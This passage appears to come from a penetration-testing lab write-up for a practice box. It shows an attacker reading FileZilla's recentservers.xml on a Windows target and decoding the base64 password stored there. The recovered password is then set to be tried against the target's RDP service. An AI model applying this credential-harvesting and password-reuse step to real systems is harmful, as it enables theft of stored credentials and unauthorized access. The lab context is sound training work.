FileZilla
The target system has FileZilla installed.
PS C:\Users\divine\AppData\Roaming\FileZilla> ls
Directory: C:\Users\divine\AppData\Roaming\FileZilla
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2021 8:40 PM 18963 filezilla.xml
-a---- 12/6/2021 8:40 PM 451 layout.xml
-a---- 12/6/2021 8:40 PM 28672 queue.sqlite3
-a---- 12/6/2021 8:40 PM 458 recentservers.xml
PS C:\Users\divine\AppData\Roaming\FileZilla> cat recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server>
<Host>ftp.pg</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>divine</User>
<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
<Logontype>1</Logontype>
<PasvMode>MODE_DEFAULT</PasvMode>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>FileZilla client stores credential in the recentservers.xml file
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ echo -n Q29udHJvbEZyZWFrMTE= | base64 -d
ControlFreak11The password might belong to the current user; divine
Validating against the target RDP server